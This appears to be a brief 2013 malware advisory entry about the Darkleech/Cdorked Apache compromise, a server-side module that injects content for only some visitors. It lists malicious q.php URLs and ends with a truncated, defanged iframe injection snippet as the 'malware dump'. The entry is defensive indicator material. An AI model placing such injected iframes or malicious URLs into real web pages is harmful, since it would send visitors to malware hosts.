Description: A highly conditional server-side malware (Darkleech or Cdorked) was identified on the server; "conditional" here means the injection is served only to some visitors, so a single request will not always reproduce it. This is an ongoing campaign, and it means the server was compromised with malicious Apache modules or binaries. More details here:
1- New Apache Module Injection
2- Apache Binary Backdoors on Cpanel-based servers
3- Server Compromises – Understanding Apache Module iFrame Injections and Secure Shell Backdoor
Domains involved:
http://1swifthost.speediahost.com/319c19c7059638898b1d363da61ceec0/q.php
http://67.213.213.17/63aa46fa31dda8b5/q.php
.. others (randomly generated)
Affecting: Any type of Linux-based server.
Latest update: 2013/Jun
Malware dump:
<iframe src="httx://1swifthost.speediahost.com/...